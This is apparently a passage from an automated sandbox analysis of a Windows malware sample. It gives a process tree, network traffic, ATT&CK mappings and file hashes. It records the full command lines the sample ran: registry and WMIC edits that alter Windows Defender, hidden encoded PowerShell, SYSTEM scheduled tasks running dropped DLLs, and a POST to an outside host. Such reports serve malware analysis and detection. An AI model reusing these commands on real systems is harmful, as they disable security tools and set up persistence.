        Command line: forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        - Indirect Command Execution
        - System Location Discovery: System Language Discovery
        PID: 804

        [depth 5] C:\Windows\SysWOW64\cmd.exe
          Command line: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
          - System Location Discovery: System Language Discovery
          PID: 908

          [depth 6] \??\c:\windows\SysWOW64\reg.exe
            Command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
            PID: 604

      [depth 4] C:\Windows\SysWOW64\forfiles.exe
        Command line: forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        - Indirect Command Execution
        PID: 2996

        [depth 5] C:\Windows\SysWOW64\cmd.exe
          Command line: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
          PID: 1948

          [depth 6] \??\c:\windows\SysWOW64\reg.exe
            Command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
            PID: 1788

      [depth 4] C:\Windows\SysWOW64\forfiles.exe
        Command line: forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        - Indirect Command Execution
        - System Location Discovery: System Language Discovery
        PID: 684

        [depth 5] C:\Windows\SysWOW64\cmd.exe
          Command line: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
          PID: 2516

          [depth 6] \??\c:\windows\SysWOW64\reg.exe
            Command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
            - System Location Discovery: System Language Discovery
            PID: 2384

      [depth 4] C:\Windows\SysWOW64\forfiles.exe
        Command line: forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        - Indirect Command Execution
        PID: 2256

        [depth 5] C:\Windows\SysWOW64\cmd.exe
          Command line: /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
          PID: 2140

          [depth 6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell start-process -WindowStyle Hidden gpupdate.exe /force
            - Command and Scripting Interpreter: PowerShell
            - Drops file in System32 directory
            - Modifies data under HKEY_USERS
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID: 2136

            [depth 7] C:\Windows\SysWOW64\gpupdate.exe
              Command line: "C:\Windows\system32\gpupdate.exe" /force
              PID: 1068

    [depth 3] C:\Windows\SysWOW64\schtasks.exe
      Command line: schtasks /DELETE /F /TN "bWNXgrRlacKgnUwPKK"
      PID: 932

    [depth 3] C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
      PID: 1616

      [depth 4] C:\Windows\SysWOW64\forfiles.exe
        Command line: forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
        - Indirect Command Execution
        PID: 2748

        [depth 5] C:\Windows\SysWOW64\cmd.exe
          Command line: /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
          - System Location Discovery: System Language Discovery
          PID: 1156

          [depth 6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
            - Command and Scripting Interpreter: PowerShell
            - Drops file in System32 directory
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID: 2088

            [depth 7] C:\Windows\SysWOW64\Wbem\WMIC.exe
              Command line: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
              - System Location Discovery: System Language Discovery
              - Suspicious use of AdjustPrivilegeToken
              PID: 1276

      [depth 4] C:\Windows\SysWOW64\forfiles.exe
        Command line: forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
        - Indirect Command Execution
        - System Location Discovery: System Language Discovery
        PID: 848

        [depth 5] C:\Windows\SysWOW64\cmd.exe
          Command line: /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
          - System Location Discovery: System Language Discovery
          PID: 2244

          [depth 6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
            - Command and Scripting Interpreter: PowerShell
            - Drops file in System32 directory
            - System Location Discovery: System Language Discovery
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID: 2204

            [depth 7] C:\Windows\SysWOW64\Wbem\WMIC.exe
              Command line: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
              - Suspicious use of AdjustPrivilegeToken
              PID: 2216

    [depth 3] C:\Windows\SysWOW64\schtasks.exe
      Command line: schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\rksWaXujU\EFzTpY.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "AlVsOicJKGYGSUS" /V1 /F
      - Drops file in Windows directory
      - System Location Discovery: System Language Discovery
      - Scheduled Task/Job: Scheduled Task
      PID: 2188

    [depth 3] C:\Windows\SysWOW64\schtasks.exe
      Command line: schtasks /CREATE /TN "AlVsOicJKGYGSUS2" /F /xml "C:\Program Files (x86)\rksWaXujU\dgpWayZ.xml" /RU "SYSTEM"
      - Scheduled Task/Job: Scheduled Task
      PID: 2672

    [depth 3] C:\Windows\SysWOW64\schtasks.exe
      Command line: schtasks /END /TN "AlVsOicJKGYGSUS"
      PID: 1780

    [depth 3] C:\Windows\SysWOW64\schtasks.exe
      Command line: schtasks /DELETE /F /TN "AlVsOicJKGYGSUS"
      - System Location Discovery: System Language Discovery
      PID: 1784

    [depth 3] C:\Windows\SysWOW64\schtasks.exe
      Command line: schtasks /CREATE /TN "HqaqbRPcNxJZrD" /F /xml "C:\Program Files (x86)\MivewcCGXeCU2\pfpSGyE.xml" /RU "SYSTEM"
      - System Location Discovery: System Language Discovery
      - Scheduled Task/Job: Scheduled Task
      PID: 1860

    [depth 3] C:\Windows\SysWOW64\schtasks.exe
      Command line: schtasks /CREATE /TN "KtgLbJTNbqQVX2" /F /xml "C:\ProgramData\BiTaXhratCGNPnVB\OqlCPyB.xml" /RU "SYSTEM"
      - Scheduled Task/Job: Scheduled Task
      PID: 1932

    [depth 3] C:\Windows\SysWOW64\schtasks.exe
      Command line: schtasks /CREATE /TN "CaeXOOsQHbNfKhlUh2" /F /xml "C:\Program Files (x86)\ZIWhWpltLlQHHUslkTR\izElhPb.xml" /RU "SYSTEM"
      - Scheduled Task/Job: Scheduled Task
      PID: 2404

    [depth 3] C:\Windows\SysWOW64\schtasks.exe
      Command line: schtasks /CREATE /TN "eUzrIsCcCKtUEuKCBuS2" /F /xml "C:\Program Files (x86)\BnSeAqsvAhUdC\nYKHVyW.xml" /RU "SYSTEM"
      - Scheduled Task/Job: Scheduled Task
      PID: 1972

    [depth 3] C:\Windows\SysWOW64\schtasks.exe
      Command line: schtasks /CREATE /TN "KOXGBKFkHUHlhNtav" /SC once /ST 00:23:17 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ErKIoDgHiflivqkZ\dCdkihji\aMTozzm.dll\",#1 /aNdidF 525403" /V1 /F
      - Drops file in Windows directory
      - Scheduled Task/Job: Scheduled Task
      PID: 1980

    [depth 3] C:\Windows\SysWOW64\schtasks.exe
      Command line: schtasks /run /I /tn "KOXGBKFkHUHlhNtav"
      PID: 2040

    [depth 3] C:\Windows\SysWOW64\schtasks.exe
      Command line: schtasks /DELETE /F /TN "mVwrlHrSDNRLOGqZG"
      PID: 2440

    [depth 3] C:\Windows\SysWOW64\WerFault.exe
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 612 -s 1540
      - Loads dropped DLL
      - Program crash
      PID: 2028

  [depth 2] C:\Windows\system32\rundll32.EXE
    Command line: C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ErKIoDgHiflivqkZ\dCdkihji\aMTozzm.dll",#1 /aNdidF 525403
    PID: 2288

    [depth 3] C:\Windows\SysWOW64\rundll32.exe
      Command line: C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ErKIoDgHiflivqkZ\dCdkihji\aMTozzm.dll",#1 /aNdidF 525403
      - Blocklisted process makes network request
      - Checks BIOS information in registry
      - Loads dropped DLL
      - Drops file in System32 directory
      - System Location Discovery: System Language Discovery
      - Enumerates system info in registry
      - Modifies data under HKEY_USERS
      PID: 2704

      [depth 4] C:\Windows\SysWOW64\schtasks.exe
        Command line: schtasks /DELETE /F /TN "KOXGBKFkHUHlhNtav"
        PID: 2668

[depth 1] C:\Windows\system32\taskeng.exe
  Command line: taskeng.exe {A9D37EFA-5736-4263-8B18-5CF7CD4EAAC9} S-1-5-21-3434294380-2554721341-1919518612-1000:ELZYPTFV\Admin:Interactive:[1]
  PID: 2356

  [depth 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 2396

    [depth 3] C:\Windows\system32\gpupdate.exe
      Command line: "C:\Windows\system32\gpupdate.exe" /force
      PID: 1804

  [depth 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 2276

    [depth 3] C:\Windows\system32\gpupdate.exe
      Command line: "C:\Windows\system32\gpupdate.exe" /force
      PID: 2736

  [depth 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 1628

    [depth 3] C:\Windows\system32\gpupdate.exe
      Command line: "C:\Windows\system32\gpupdate.exe" /force
      PID: 3052

[depth 1] C:\Windows\system32\gpscript.exe
  Command line: gpscript.exe /RefreshSystemParam
  PID: 876

[depth 1] C:\Windows\system32\gpscript.exe
  Command line: gpscript.exe /RefreshSystemParam
  PID: 2796

[depth 1] C:\Windows\system32\gpscript.exe
  Command line: gpscript.exe /RefreshSystemParam
  PID: 2656
Network
Remote address: 8.8.8.8:53
Request: service-domain.xyz IN A
Response: service-domain.xyz IN A 54.210.117.250

Remote address: 8.8.8.8:53
Request: c.pki.goog IN A
Response: c.pki.goog IN CNAME pki-goog.l.google.com; pki-goog.l.google.com IN A 216.58.214.163

Remote address: 216.58.214.163:80
Request:
GET /r/r1.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: c.pki.goog
Response:
HTTP/1.1 200 OK
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
Content-Length: 854
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Mon, 26 Aug 2024 04:29:28 GMT
Expires: Mon, 26 Aug 2024 05:19:28 GMT
Cache-Control: public, max-age=3000
Age: 2088
Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
Content-Type: application/pkix-crl
Vary: Accept-Encoding

Remote address: 8.8.8.8:53
Request: o.pki.goog IN A
Response: o.pki.goog IN CNAME pki-goog.l.google.com; pki-goog.l.google.com IN A 216.58.214.163

GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQCjHbN8Q48ByBJsBZfEZOeO (process: gLYDEcB.exe)
Remote address: 216.58.214.163:80
Request:
GET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQCjHbN8Q48ByBJsBZfEZOeO HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: o.pki.goog
Response:
HTTP/1.1 200 OK
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Date: Mon, 26 Aug 2024 04:59:21 GMT
Cache-Control: public, max-age=14400
Content-Type: application/ocsp-response
Age: 295

GET http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEHGN%2BKTRSIp4CcztJxB9gYQ%3D (process: gLYDEcB.exe)
Remote address: 216.58.214.163:80
Request:
GET /wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEHGN%2BKTRSIp4CcztJxB9gYQ%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: o.pki.goog
Response:
HTTP/1.1 200 OK
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Date: Mon, 26 Aug 2024 04:21:26 GMT
Cache-Control: public, max-age=14400
Content-Type: application/ocsp-response
Age: 2570

GET http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEHM9QmVn2rE0CqmPuQDOLLc%3D (process: gLYDEcB.exe)
Remote address: 216.58.214.163:80
Request:
GET /wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEHM9QmVn2rE0CqmPuQDOLLc%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: o.pki.goog
Response:
HTTP/1.1 200 OK
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Date: Mon, 26 Aug 2024 04:34:52 GMT
Cache-Control: public, max-age=14400
Content-Type: application/ocsp-response
Age: 1765

Remote address: 8.8.8.8:53
Request: clients2.google.com IN A
Response: clients2.google.com IN CNAME clients.l.google.com; clients.l.google.com IN A 172.217.18.206

GET https://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&rAOuOSNtrU (process: gLYDEcB.exe)
Remote address: 172.217.18.206:443
Request:
GET /service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&rAOuOSNtrU HTTP/1.1
Host: clients2.google.com
Connection: Keep-Alive
Cache-Control: no-cache
Response:
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 26 Aug 2024 05:04:16 GMT
Location: https://clients2.googleusercontent.com/crx/blobs/AVsOOGimIxh1rhNkuyBhew9Hsf2hNmyMgOraF_izzMtJtEXlIssKc0YNwVz8wTsE4nylCKjkrZ9hsfVrr9F_gdbV0xXIN1fbRZEs0PBfI-72wNWYv83mAMZSmuVBqaBj-sl4F5ifoVjF0_R2Kfnyog/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked

Remote address: 8.8.8.8:53
Request: clients2.googleusercontent.com IN A
Response: clients2.googleusercontent.com IN CNAME googlehosted.l.googleusercontent.com; googlehosted.l.googleusercontent.com IN A 142.250.178.129

GET https://clients2.googleusercontent.com/crx/blobs/AVsOOGimIxh1rhNkuyBhew9Hsf2hNmyMgOraF_izzMtJtEXlIssKc0YNwVz8wTsE4nylCKjkrZ9hsfVrr9F_gdbV0xXIN1fbRZEs0PBfI-72wNWYv83mAMZSmuVBqaBj-sl4F5ifoVjF0_R2Kfnyog/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx (process: gLYDEcB.exe)
Remote address: 142.250.178.129:443
Request:
GET /crx/blobs/AVsOOGimIxh1rhNkuyBhew9Hsf2hNmyMgOraF_izzMtJtEXlIssKc0YNwVz8wTsE4nylCKjkrZ9hsfVrr9F_gdbV0xXIN1fbRZEs0PBfI-72wNWYv83mAMZSmuVBqaBj-sl4F5ifoVjF0_R2Kfnyog/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx HTTP/1.1
Connection: Keep-Alive
Cache-Control: no-cache
Host: clients2.googleusercontent.com
Response:
HTTP/1.1 200 OK
Content-Length: 26186
X-GUploader-UploadID: AHxI1nNL7H3AJRDcftdM8nudrN063LHkjG-K2xCLaAq_CiodWecH9ArWxzdSUlfXc63WthxHMbk
X-Goog-Hash: crc32c=i5zIOg==
Server: UploadServer
Date: Sun, 25 Aug 2024 07:35:10 GMT
Expires: Mon, 25 Aug 2025 07:35:10 GMT
Cache-Control: public, max-age=31536000
Age: 77347
Last-Modified: Fri, 31 Mar 2023 12:41:59 GMT
ETag: eefd433b_0ed85c7c_6772d0c2_d374e578_c3d87100
Content-Type: application/x-chrome-extension
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000

Remote address: 8.8.8.8:53
Request: api5.check-data.xyz IN A
Response: api5.check-data.xyz IN CNAME checkdata-1114476139.us-west-2.elb.amazonaws.com; checkdata-1114476139.us-west-2.elb.amazonaws.com IN A 44.228.3.54; checkdata-1114476139.us-west-2.elb.amazonaws.com IN A 44.224.108.88

Remote address: 44.228.3.54:80
Request:
POST /api2/google_api_ifi HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/0 Safari/537.36
Host: api5.check-data.xyz
Content-Length: 722
Connection: Keep-Alive
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Cache-control: no-cache="set-cookie"
Content-Type: text/html; charset=UTF-8
Date: Mon, 26 Aug 2024 05:01:28 GMT
Server: nginx
Set-Cookie: AWSELB=9327DF5F0AF3D375CDC9DE0AFF98FDC82A9589C9820401D99493DFDF796F3DAB0062EEFB3E4A533F5B2753F2532FBA9D17E5754692E8600D254000879A4CE3001E279F1EF5;PATH=/;MAX-AGE=43200
Content-Length: 0
Connection: keep-alive

Connection summary (sent / received / packets sent / packets received)
- 399 B / 219 B / 5 / 5
- 361 B / 219 B / 5 / 5
- 334 B / 219 B / 6 / 5
- 190 B / 92 B / 4 / 2
- 394 B / 1.7kB / 6 / 4
  HTTP Request: GET http://c.pki.goog/r/r1.crl
  HTTP Response: 200
- 216.58.214.163:80, http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEHM9QmVn2rE0CqmPuQDOLLc%3D, http, gLYDEcB.exe: 1.2kB / 3.1kB / 10 / 6
  HTTP Request: GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQCjHbN8Q48ByBJsBZfEZOeO
  HTTP Response: 200
  HTTP Request: GET http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEHGN%2BKTRSIp4CcztJxB9gYQ%3D
  HTTP Response: 200
  HTTP Request: GET http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEHM9QmVn2rE0CqmPuQDOLLc%3D
  HTTP Response: 200
- 172.217.18.206:443, https://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&rAOuOSNtrU, tls, http, gLYDEcB.exe: 1.1kB / 8.6kB / 10 / 12
  HTTP Request: GET https://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&rAOuOSNtrU
  HTTP Response: 302
- 142.250.178.129:443, https://clients2.googleusercontent.com/crx/blobs/AVsOOGimIxh1rhNkuyBhew9Hsf2hNmyMgOraF_izzMtJtEXlIssKc0YNwVz8wTsE4nylCKjkrZ9hsfVrr9F_gdbV0xXIN1fbRZEs0PBfI-72wNWYv83mAMZSmuVBqaBj-sl4F5ifoVjF0_R2Kfnyog/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx, tls, http, gLYDEcB.exe: 1.6kB / 38.0kB / 21 / 32
  HTTP Request: GET https://clients2.googleusercontent.com/crx/blobs/AVsOOGimIxh1rhNkuyBhew9Hsf2hNmyMgOraF_izzMtJtEXlIssKc0YNwVz8wTsE4nylCKjkrZ9hsfVrr9F_gdbV0xXIN1fbRZEs0PBfI-72wNWYv83mAMZSmuVBqaBj-sl4F5ifoVjF0_R2Kfnyog/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx
  HTTP Response: 200
- 1.2kB / 536 B / 5 / 3
  HTTP Request: POST http://api5.check-data.xyz/api2/google_api_ifi
  HTTP Response: 200
- 64 B / 80 B / 1 / 1
  DNS Request: service-domain.xyz
  DNS Response: 54.210.117.250
- 56 B / 107 B / 1 / 1
  DNS Request: c.pki.goog
  DNS Response: 216.58.214.163
- 56 B / 107 B / 1 / 1
  DNS Request: o.pki.goog
  DNS Response: 216.58.214.163
- 65 B / 105 B / 1 / 1
  DNS Request: clients2.google.com
  DNS Response: 172.217.18.206
- 76 B / 121 B / 1 / 1
  DNS Request: clients2.googleusercontent.com
  DNS Response: 142.250.178.129
- 65 B / 159 B / 1 / 1
  DNS Request: api5.check-data.xyz
  DNS Response: 44.228.3.54, 44.224.108.88
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter (1): PowerShell (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Persistence
- Create or Modify System Process (1): Windows Service (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Privilege Escalation
- Create or Modify System Process (1): Windows Service (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Defense Evasion
- Impair Defenses (2): Disable or Modify Tools (2)
- Indirect Command Execution (1)
- Modify Registry (2)
Downloads
- Filesize: 2KB
  MD5: b731bebaa7c2551eed44d76cd5e76ff3
  SHA1: 965b3a0c57891661454681f1f6acbcb282321fd0
  SHA256: 81df7344c54b6be5bece3eacf37ab55125a13111f348b1107af482dfcdb27891
  SHA512: fa747a132f7ea38ae407808fe298243f21d7bb725e79c2e9ba793f2bacaf3277d958d43355ea53e6871024d9a303a3f1eda7dee46b1d06b5122253d9aad67817

- Filesize: 2KB
  MD5: 3019b73c639d36635656868079266e22
  SHA1: 02ba8c9fae452ba2d13b73330a34a69f5245b550
  SHA256: 2c341aa3858b5cc69c135865c8cdc895afc5011b6e5ec27ecbfe765c076f4d4e
  SHA512: e8e5aab3bccaaf31364fc14a44c2ab33004c2dcd7987cd34342657ebf5a1ef737b723732411733c011e25bd7d2dd1cdb14eb63fd538fe8f9e2f43e188fd61a1a

- Filesize: 2KB
  MD5: 7f074d6d3dc8ba867cb1a9595d75fa82
  SHA1: ba9940e7d8e308900dd00ccba56792267e8fd760
  SHA256: 013b14d5876c1cd228c502195410fb6fc4e3d5d1bab9ef8b2510aa7559de6afe
  SHA512: fddece89e378bbc5115792e7d65e08ed0b9e0d72bf36e682891e46c21493ad1a80071eb53bedaf1011859e9c8e7f830504610c3e61305b631dce72f988778562

- Filesize: 2KB
  MD5: e3124c51196627235f81021202497539
  SHA1: 47c94b60c6beda449239806d837a6aa9db5e9f24
  SHA256: 41fcef80af53d1b93a4f92c8e636572d8c4aeecb5fc3214e6ef61a0225f69b73
  SHA512: b7b7583d5106f43ba4b28e6963f6d8e934626e79438bc1c33cedc63f04e4b6031caa2ff4f9fa933a61a26bb458b7b59eeea9b38553fe08c59c99cc91242582d8

- Filesize: 2.0MB
  MD5: 2f02cc2a0c1066593cac569fb44fde98
  SHA1: cdef228219837ccb3c7061afcd70760ef0b9c720
  SHA256: a32071cd6aa585d567c0f5425759c85098b1f460ef320f7ad43c9ac635f3fca5
  SHA512: 0f9e6449d02e31fc4ebabd09bf03d454dceb703968b9c53b771512bd045ea7256df091f792b856463d03e5a8e17f40e28c826d20ec710b0cc2e92eee524269f1

- Filesize: 2KB
  MD5: a6e25931e5fcd838c93db33dda4ef846
  SHA1: 6bee9fe9acfe5d3901a5748029aa5b1aa14ddf63
  SHA256: dc0e3e35c22281d704d36d12deb132362a384d008a5bdff0344054d52281d825
  SHA512: dae9b7d2c5a077e1adc8e8ac289cdbddf621caadea092acb2a06ba5fbfb1f785b0f37e4573d73952ecdc6198ddf78df2900fa6321d647ac8f867899471b3c3bb

- C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json
  Filesize: 187B
